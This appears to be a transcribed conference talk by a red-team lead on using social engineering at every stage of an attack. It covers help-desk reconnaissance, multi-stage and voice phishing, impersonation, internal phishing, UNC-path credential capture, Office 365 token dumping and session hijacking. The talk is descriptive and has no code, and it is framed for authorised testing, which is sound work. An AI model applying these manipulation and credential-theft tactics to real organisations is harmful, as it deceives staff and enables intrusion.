Social Engineering The Kill Chain by Tom Harrison

thank you very much welcome to your TomTom lunchtime doubleheader for the red team check uh so who am I uh I'm Tom Harrison uh I've got over 15 years in various different types of uh infosec with about half of that being on the offensive side uh done a whole bunch of red teaming uh and I'm now ahead of offensive security for a large financial company that's probably a pretty trivial ocean piece of exercise to be able to find out which company I classify myself an adventure hacker which is what I think a red team has fallen under but I need to get to do hacking but we also get to do things in person and about and

doing things you know that are actually exciting with that side of things I'm a gamer I'm a dad of uh two toddlers and two teenagers if you want to do uh high intensity low complexity social engineering I recommend Parenting teenagers um I'm a complete uh psychology language systems uh tech gaming nerd like any of that stuff I'll round about for hours so what's this talk uh this is a collection of uh learnings from Mostly social engineering related stuff so about about five six years ago I started to go really deep on the people side of security having done the technical side for ages uh and then naturally went around conferences talking to people who had similar interests digging things out

of them dealing with uh red teams as part of work as well as the stuff that I've learned from when I've been doing social engineering exercises and that sort of stuff uh it's trying to look at Social Engineering as part of an attack path so rather than just using at the start using it throughout what red teams are doing in order to gain extra compromise and confuse blue teams um I'm gonna look at more than just that initial first fish and trying to get initial access uh I'm not going to be showing any uh you know people security zero days I'm not going to go hey if you say this magic word to people they'll

let you through doors or anything like that and likewise the majority of other stuff I'm presenting is uh mostly around kind of um stuff that's been publicly released or is just kind of useful when you're in that situation um so standard disclaimers uh don't break the law only test systems you're allowed to test uh even red team as if you're doing social engineering or physical stuff get it cleared with legal before you actually go and do it because different countries different laws all that sort of stuff um don't break ethics so for me this is a big one um if you're a consultancy team coming in to do red teaming uh you don't want the company you're testing to be like

you've made six of our employees cry and likewise if you're working internal as an offset team then you don't want to be making your colleagues cry because now that's not going to help either so in general try and leave people feeling happy if I met you rather than sad for it um these are obviously my opinions uh nothing to do with my employer or anyone else cool so social engineering 101 um or not really social engineering 101 because not enough time for that so uh I consider it to be the art or science of influencing or manipulating humans into doing something um so really broad but kind of covers the main Concepts that we'll do with it so we use

pretext which is basically your excuse for why you're asking them to do a particular thing uh I'm Dave the aircon man who's come to fix that broken aircon unit in your data center is an example of a pretext we leverage a lot of human trust so it's always important for me to be considerate of where you are who you're talking to what your pretext is and what the trust exist between you and the other people in an organization or the people that you're trying to deal with or social engineer and there's a whole ream of talks books research that cover social engineering in a lot more depth than I've got a chance to do here so I

kind of covered this to hopefully do the majority of the kind of really rough overview but do dive deeper and do your own research cool so we're going to skip through different stages of kill chain whilst I've used the phrase kill chain for the Lockheed Martin structure of how attacks happen uh these days it's not that lateral and it's always a bit of a poor model so I'll kind of skip through probably mostly miter attack classifications as to how you classify a kill chain so reconnaissance so active Recon so the idea of rather than the kind of classic passive reconnaissance that most uh red teams do trying to actually elicit stuff by engaging and contacting the organization

or you know actually digging and speaking to people so one of the things that uh I always find is a really good way to find out stuff that you haven't managed to pick up from the external Recon so if you're like we're still not sure what AV they're using when you're talking to a user and you go oh what's the little icon that's next to the clock in the bottom right they'll go oh yeah it's this weird M with a shield around it and you know they're running McAfee for example so always be ready when you're doing this sort of stuff to the same way if you're doing a uh like pen test or red team and

you will like spam do a mass a mass fish right at the start you expect that the Defenders are going to spot that and then are going to be like we don't trust that domain anymore so apply the same rules when you're doing uh fishing or uh anything like that to make sure that you using new phone numbers you're not using the same pretext you've used before you're not using the same email addresses you before you know you are engaging to find that information but once the information's got that is the end of this kind of section of the campaign so burn whatever it is you're using so they're not just going to detect you when you start using it again

later on um and then this is the really really useful bit so anyone who does uh this type of testing will go we always end up falling back to uh ocean and Recon and things like that as you go through the test to learn more with the things you've already found so this active Recon step like be ready to go back in and kind of go cool this is this is what we know now we can now be a more convincing person asking the help desk for help rather than a less condensing one so fishing for intelligence so a load and load of information can come just from a conversation with people so as well as

stuff like hey what version of os are they using what software is on the machines what AV are they using you also get a whole bunch of cultural and language stuff that you normally consider to be kind of outside the scope a little bit of kind of the Cyber cider testing but it's so useful to be able to use that language use that information use what people have told you when you are engaging other humans in an organization so being able to get internally transferred is one of the most brilliant things when you're doing uh Vision based testing you're coming from an internal number that someone's just forwarded you from and you've got that moment potentially

completely switch the pretext you're using so initially you were a customer looking for help with a particular product that you're running and then when they transfer you through you get there and you know that you're coming from an internal number and you go yeah one of the people in the help desk told me I'm a sys admin I need to help you with the problems you've got on your on your product that we're using at the moment so being able to kind of quickly turn that and go I need to switch to something that's got internal trust versus a sort of external customer trust is really really useful uh it's worthwhile mentioning that this stuff's

decaying so the more people are using teams the more people are kind of using ticketing software that sort of stuff less and less it's kind of all handled by phone systems so you kind of have to expect that if you're going outside of like help desks or uh you know uh incident desks that sort of thing you're probably going to end up not being able to find a phone number to talk to someone so speaking of which uh Recon the help desk so help desks are absolutely amazing for the amount of information you can pull from them so everything from hey I'm a new starter can you tell me how I get my password sorted and where I should find it and

that sort of stuff through to hey how do I report an incident with this piece of software or This Server that I've got issues with um and then they also spit back at you things like terminology you know do they do they use the term tickets do they use the term incidents do they um you know refer to refer to servers in a certain way are there certain naming conventions that sort of stuff it's all things that you can mine from a help desk who are you know by virtue of the name trying to be helpful again this is one of those things that you can use multiple times throughout not as you sort of get

through it to go this is this is an area where we want to now get a ticket raise for this machine or we want to persuade them to do a certain type of thing at a certain point the help desk is an instant source for all of that sort of stuff and then the other thing is as people know that's a lot of social engineering pretexts involved hey I'm the guy from it just because it's uh second nature to the vast majority of us being able to go yes I know technical stuff and I can talk networks and I T to you so being able to listen to them talk to you gives you a kind of really good

basis for what you build your pretext off from when you want to go and uh kind of pretend to be an IT admin or something later on cool so that's reconnaissance so we're going to go into initial access so this is probably a little bit untrue but uh certainly single stage fishing is dying so uh the idea of uh the kind of fishing awareness campaigns that sort of thing and people sending just one email in it getting a single click and then being able to compromise based on that is getting harder and harder and harder I've listed out there the kind of things that um the things that will prevent you or the things you have to overcome so

things like hey has my uh origin domain for the email got a decent reputation is it configured how they're expecting an email server to be configured so it looks legit then when we when emails come in is the Gateway going to detonate your malware is it going to detect it based on signature gotta Dodge all that stuff before you even land on the host then when you land on the host you've got AV and EDR to cope with as well as uh user awareness which I've worked with a lot of really good education awareness teams it's getting better and better and it's getting harder and harder to trick users into actually just clicking it because

they expect fish to look like that and then that damn external email Banner so if you work for a larger Enterprise company the vast majority of them these days have got a lovely incredibly bright eye blinding uh piece of dreadful UI design that says this is an external email uh which is which is actually really really really effective at making people be a little bit more suspicious about what it is they're clicking on and then you've landed you've bypassed all that stuff your payload's still got to reach back out to your CT infrastructure you've still got to get that kind of last hook in um and then you've got to go through things like uh command control domain

reputation uh you've got to get past the web Gateway and whether it's going to detect your Commerce channel that you're using then you've got to evade NDS or behavior-based stuff you've got to look at whether DNS is being looked into and kind of inspected a whole bunch of stuff which makes it really hard and as an attacker you don't really want to go the really hard route if you can avoid it so instead uh multi-stage fishing which is really great because you're not trying to go hey click this link you're you're trying to say hey engage with me so I can start building Rapport and start to gain a little bit of your trust to

eventually leverage that for something else so it's really good to make sure you're doing your kind of ocean and degrees of kind of knowing who you're targeting you don't necessarily do Mass fish for this type of stuff because it tends to be that you want to selectively kind of group stuff to make it a little bit more convincing and start a conversation um but you do want to do it in bulk still and then hit a reasonable amount of people the beautiful thing about this is that you're trying to find people who might be susceptible to social engineering so sending out an initial start of a conversation with people from an unknown address instantly identifies

the people that are likely to be susceptible to social engineering so you kind of completing your own pre-screening of them before you even start attacking um conversations are really good for leveraging your pretext so it's difficult to get in one email make someone believe that you are a guy from the uh it help desk or something similar to that if you're doing it over a long conversation you start talking about work you start talking about you know what you're doing today kind of break out some of the standard routines that people expect you get a lot more chance to influence them and kind of get them on your side and hopefully by the time you get to the point where you're like

hey yeah can you click this or can you go to this website and run this they're already believing that you can't be one of those fish people because one of those fish people sends loads of mails and aren't real people they're just automated systems out there on the internet somewhere so talk about Blended attacks so this is a kind of the idea of crossing over uh multiple streams of social engineering so going from things like fishing through to fishing through to impersonation uh is a really good way of gaining trust gaining people believing into the pretext you're using uh I spoke to a friend of mine who's a PhD in a history related subject and she was

talking about how uh you know the multiple Source idea that you don't believe anything in history unless it comes from multiple sources I think that's a lot of what kind of forms that Foundation as a human if you're getting something from both the phone call and an email you're a lot more likely to believe it than just either one of the two independently I tend to find that kind of ramping up the Fidelity curve so starting out with fishing and then following it with a phone call or sign up with a phone call and then following by something in person is kind of the best way to do it it's difficult to kind of do it the other way around and go

yeah I'm in person but I'm going to send you a phishing email later it kind of defeats the purpose all the time so vision remote code execution so uh obviously people find it a lot harder to say no uh when you're on voice rather than just clicking delete on a fish particularly uh British people really don't like saying no I think it's on natural inbuilt manners they love letting your tailgate they love uh trying to help you out when you're on phone when you're on the phone there's a really weird uh much as I kind of hate the UI design and and uh and sort of development life cycle people the idea of a Target journey is

something you should definitely spend time considering so going hey how difficult is it for them to actually run through my kind of process to be able to get exploitation so can I easily Point them at the right website are they going to get alerts that say this might be dodgy that sort of thing going hey what are they going to see how do I need to talk them through it and kind of being ready to do that initial user support um to get your payload landed ideally you come across as better and better supporting of your payload than the uh actual Health that's good if they're trying down to do something so this is where uh that initial Recon that

digging in and going hey this is what services they're running this is what uh security controls they're running really really useful uh so impersonation which is the in-person part of social engineering the uh actually showing up and pretending to be someone is an incredibly deep and complex part of social engineering there's there's a whole bunch of different stuff that you can you can read up about it it's very very deep there's a lot of crossover with physical so uh you'll find that you're effectively doing physical pen testing like a lot of people refer to it as over and covert physical physical pen testing um so it's important to have your your pretext kind of at the ready so both

knowing who it is you're pretending to be what you need to say if you get challenged uh you know that sort of stuff as well as the context so knowing whereabouts in the organization you are like if you're just walking around they'll expect most colleagues to be hey that guy's just stood in an office whereas if you're stood in a data hall or something like that you need to have a pretext ready that fits the context of where you're being challenged and stuff like that so it's also good to know when to switch context so uh you know having a colleague badge to be able to switch out for a visitor pass things like that

of knowing what is the best person to be or what is the best pretext to use when you're in different situations within an organization so we're gonna move on to lateral movement um and we'll talk about sort of moving from host to host and trying to confuse and uh baffle The Blue Team so uh trust is really good uh for being assumed when you are internal so that fishing Banner which I complain about uh endlessly has the added benefit of whilst they're suddenly much more distrustful of stuff coming from external it also means there are more trusting of stuff that's coming from internal so if you can find internal fishing they've got one of those fishing

banners that's almost saying hey this will be okay because it's not got a big banner at the top that's blinding you when you try and read the email uh using a variety of vectors so uh whilst email's pretty good and it's probably the one that I default to most trying these other things so so teams messages being able to uh you know dump stuff on servers and refer people to it that sort of thing I don't know many socks that will uh look at lateral movement and go hey did that user send any emails did they send any teams messages with attachments that sort of thing it starts to be harder and harder to dig into how people are moving across

the network um hey come here yes so uh also try and Vary payload or infrastructure so if you're going to move from one place to another don't be using the same payload that you were using initially use something different so how can we do this uh so UNC uh the classic thing Neil lines presented it here about five years ago I sat and watched him in a workshop um about using UNC paths to be able to capture credentials doing that when you're inside means that you've not got all the firewalls blocking those connections outbound um using open open shares to post mail docs that sort of thing uh music types of you can avoid web gateways you don't

have to do all that hard work to get your payloads in um owa uh Outlook web access a really good way to be able to start firing emails and pretending to be someone there's a bunch of toolkits that let you do it uh stealing Office 365 tokens office helpfully keeps plain text versions of your 0365 credits in memory so if you compromise the host you can just dump the credits for the uh 0365 authentication and then the Microsoft com object which is what Microsoft helpfully puts together for you to interface with uh Office Products use using Powershell and things like that you can do that to be able to start firing emails or even in some cases uses

a full C2 over email so privilege escalation so when we've got a compromised host on the network uh you can eventually act like an internal Honeypot for admins so you can go oh this user's got a problem or I've got a problem with this laptop or hey I'm this user please can you log in and sort out my access because I can't seem to get word running and Trigger the trigger an admin to log into you rather than trying to wait for the admin to log in um so ideally get the user to raise something and get them to kind of raise a ticket so it looks even more legitimate but raise it yourself if you

can't um try and make things seem operational rather than security related you don't want an admin logging on because he thinks there's some sort of security issue on a box if you've got a payload running on it unless you unless you're really really confident about how well hidden you are so yeah be aware that they're going to come looking for you so password vaults uh another really good source of kind of privilege escalation uh really high value Target uh if anywhere has defenses around it if anyone's going to notice you're attacking it's probably the password vault so rather than try and break in uh instead let a trusted user go and break something out for you that

you need so uh go and compromise someone that you know will be doing work on that server or will pick up a ticket to do with XY or Zed and then go and get one of those tickets raised in order so they go and break it out and go and break the password out for you and then sit it on their little client that's likely got a lot less security than the big powerful password so action on objectives uh are you achieving what it is we want to do um so session hijacking is probably one of the ones that is used most at the moment uh so you wait for a user to actively log into the web page or the

application that they need to log into to do their work at which point you can then drag their credentials out of memory uh kind of dump whatever authentication they're using uh use man in the browser if necessary and kind of use their credentials that they've already authenticated with to piggyback on um again hanging around and wait for these users to do that and then and then following them it's kind of a bit boring you know it doesn't drive towards your objectives very quickly so engaging the users finding a reason why they need to log in uh you know pushing them to go and do the thing uh means that you kind of can trigger it using social

engineering rather than having to sit and wait forever um then evening really kind of Highly secure organizations uh understandably they all want to make money and that often comes as a higher priority than we want to be really secure so if you can work out based on uh internal Recon based on the things you've found from from different areas that you've been inside the network that there's some sort of business priority you can push them to break security rules in order to accomplish your business priority so that's why it's really important to understand the context and the job role and kind of the communications and daily activities of users you've compromised because if you're going to leverage one

of them for some sort of hey I need this right goddamn now then you need to know who it is that you're going to be speaking as um so yeah important to know your uh you've got a full record of the environment knowing what words to use knowing what to refer things refer to things as knowing what security controls may or may not be in place process wise for people doing things or not doing things and then kind of the classic one uh is that um there are situations I've heard of I've spoken to friends who've done it who uh where you don't even need to do all of the prerequisites for getting into a red team literally

phoning up pretending to be the right person who needs the right thing right now can just get an objective particularly we're talking about like sensitive files or you know commercial information or intellectual property just being able to call up and go I've got this really urgent business need right now that I need to accomplish so can you just send me the thing will sometimes work and will sometimes mean that you can kind of shortcut an entire adversary simulation operation and just cut right to the end and get your objective cool so that is the end uh I've got I think we've got five minutes so uh yeah any questions

we have a research engineer that involves squats and other social messages actually kind of systems that companies may use yeah so um so for those who can't hear that question was uh whether there's any kind of using methods other than just email for kind of text-based uh social engineering so phishing and trying to come in through different channels yes it's there is dangerous things around scope there because those types of accounts tend to get like teams is pretty good for it and trying to shift into the kind of Microsoft ecosystem when you start to go to like WhatsApp or LinkedIn or social media you stand a really high chance of hitting people's home machines or personal information

rather than business information and that sort of stuff so yes but it's very very difficult to tread to do it without treading on toes or causing potential legal issues and stuff

surface

and can it be the way yeah so um so the question was uh is there a certain type of person who's uh kind of predisposed to being good for physical in physical or in-person social engineering um yes and no so I always uh for those of you who are uh kind of DnD nerds uh I always refer to it as the uh I'm maxed intelligence and dumped wisdom and then learned how to use my intelligence bonus for Charisma so there are ways you can use you know you can look at the science of this of how to do it to be able to learn how to use what you know how to basically structure conversation to do

the right things also if you're nervous if you're the stereotypical you know it nerd you just make your pretext fit that so going in and going oh it's my first day I'm really nervous compensates for the fact that it's your first social engineering engagement and you're really nervous so it gives you you don't get quite as much flexibility if you kind of if you are having to lock into those things but yeah you can still leverage them and you can still do it cool yes uh yeah absolutely shed lights um so are there any specific books or resources uh Joe Gray's uh social engineering books uh Talks by uh Rachel towback Leith Dennis uh Chris hadnagi uh Chris had

Maggie's books are really good uh and then he starts fall back onto uh like chaldini's principles of trusts and uh the other kind of associated documents that are kind of old school con man or salesman uh tax are actually really really useful the big big crossover between sales and social engineering which makes me sad yeah there we go yeah and yeah books wise Catch Me If You Can and uh sorry film TV and film wise catch me if you can uh some of the uh don't lie to me that sort of stuff are good good watching as well as uh social engineering or Jason great thank you very much